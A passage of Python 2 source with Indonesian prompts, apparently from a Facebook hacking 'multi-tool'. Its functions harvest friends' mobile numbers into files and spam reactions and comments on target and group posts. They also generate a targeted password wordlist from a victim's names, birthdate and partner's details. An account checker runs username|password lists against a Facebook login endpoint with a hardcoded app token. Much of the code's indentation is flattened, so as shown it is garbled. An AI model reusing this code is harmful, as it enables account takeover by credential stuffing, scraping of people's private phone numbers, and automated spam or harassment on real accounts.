jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mNomor\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Nomor\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] Kesalahan terjadi'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def hpfrom_teman():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Belum berteman'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromteman.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mNomor\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Nomor\x1b[1;96m%s' % len(hpfromteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Bot Reactions Target Post'
print '\x1b[1;37;40m2. Bot Reactions Grup Post'
print '\x1b[1;37;40m3. Bot Komen Target Post'
print '\x1b[1;37;40m4. Bot Komen Grup Post'
print '\x1b[1;37;40m5. Mass delete Post'
print '\x1b[1;37;40m6. Terima permintaan pertemanan'
print '\x1b[1;37;40m7. Hapus pertemanan'
print '\x1b[1;31;40m0. Kembali'
print
bot_pilih()
def bot_pilih():
bots = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
    if bots == '':
        print '\x1b[1;91m[!] Jangan kosong'
        bot_pilih()
    elif bots == '1':
        menu_react()
    elif bots == '2':
        grup_react()
    elif bots == '3':
        bot_komen()
    elif bots == '4':
        grup_komen()
    elif bots == '5':
        deletepost()
    elif bots == '6':
        accept()
    elif bots == '7':
        unfriend()
    elif bots == '0':
        menu()
    else:
        print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mTidak ada'
        bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. \x1b[1;97mLike'
print '\x1b[1;37;40m2. \x1b[1;97mLove'
print '\x1b[1;37;40m3. \x1b[1;97mWow'
print '\x1b[1;37;40m4. \x1b[1;97mHaha'
print '\x1b[1;37;40m5. \x1b[1;97mSedih'
print '\x1b[1;37;40m6. \x1b[1;97mMarah'
print '\x1b[1;31;40m0. Kembali'
print
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
    if aksi == '':
        print '\x1b[1;91m[!] Jangan kosong'
        react_pilih()
    elif aksi == '1':
        tipe = 'LIKE'
        react()
    elif aksi == '2':
        tipe = 'LOVE'
        react()
    elif aksi == '3':
        tipe = 'WOW'
        react()
    elif aksi == '4':
        tipe = 'HAHA'
        react()
    elif aksi == '5':
        tipe = 'SAD'
        react()
    elif aksi == '6':
        tipe = 'ANGRY'
        react()
    elif aksi == '0':
        menu_bot()
    else:
        print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mTidak ada'
        react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. \x1b[1;97mLike'
print '\x1b[1;37;40m2. \x1b[1;97mLove'
print '\x1b[1;37;40m3. \x1b[1;97mWow'
print '\x1b[1;37;40m4. \x1b[1;97mHaha'
print '\x1b[1;37;40m5. \x1b[1;97mSedih'
print '\x1b[1;37;40m6. \x1b[1;97mMarah'
print '\x1b[1;31;40m0. Kembali'
print
reactg_pilih()
def reactg_pilih():
global tipe
aksi = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
    if aksi == '':
        print '\x1b[1;91m[!] Jangan kosong'
        reactg_pilih()
    elif aksi == '1':
        tipe = 'LIKE'
        reactg()
    elif aksi == '2':
        tipe = 'LOVE'
        reactg()
    elif aksi == '3':
        tipe = 'WOW'
        reactg()
    elif aksi == '4':
        tipe = 'HAHA'
        reactg()
    elif aksi == '5':
        tipe = 'SAD'
        reactg()
    elif aksi == '6':
        tipe = 'ANGRY'
        reactg()
    elif aksi == '0':
        menu_bot()
    else:
        print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mTidak ada'
        reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mKomentar \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mKomentar \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mMulai menghapus postingan unfaedah\x1b[1;97m ...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mGagal'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mTerhapus'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Koneksi Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
teman = json.loads(r.text)
if '[]' in str(teman['data']):
print '\x1b[1;91m[!] Tidak ada permintaan pertemanan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in teman['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Gagal'
print 40 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mTerhapus\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Buat postingan'
print '\x1b[1;37;40m2. Buat Wordlist'
print '\x1b[1;37;40m3. Akun Checker'
print '\x1b[1;37;40m4. Lihat daftar grup'
print '\x1b[1;37;40m5. Profile Guard'
print
print '\x1b[1;97m ->Coming soon<-'
print
print '\x1b[1;31;40m0. Kembali'
print
pilih_lain()
def pilih_lain():
other = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
    if other == '':
        print '\x1b[1;91m[!] Jangan kosong'
        pilih_lain()
    elif other == '1':
        status()
    elif other == '2':
        wordlist()
    elif other == '3':
        check_akun()
    elif other == '4':
        grupsaya()
    elif other == '5':
        guard()
    elif other == '0':
        menu()
    else:
        print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mTidak ada'
        pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mKetik status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Jangan kosong'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 40 * '\x1b[1;97m\xe2\x95\x90'
a = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Depan \x1b[1;97m: ')
file = open(a + '.txt', 'w')
b = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Tengah \x1b[1;97m: ')
c = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Belakang \x1b[1;97m: ')
d = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Panggilan \x1b[1;97m: ')
e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Pacar \x1b[1;97m: ')
j = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Panggilan Pacar \x1b[1;97m: ')
k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Gagal membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 40 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mPemisah \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mMati\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
            f = open('grupid.txt', 'w')
            for p in gud['data']:
                nama = p['name']
                id = p['id']
                listgrup.append(id)
                f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 40 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Grup \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
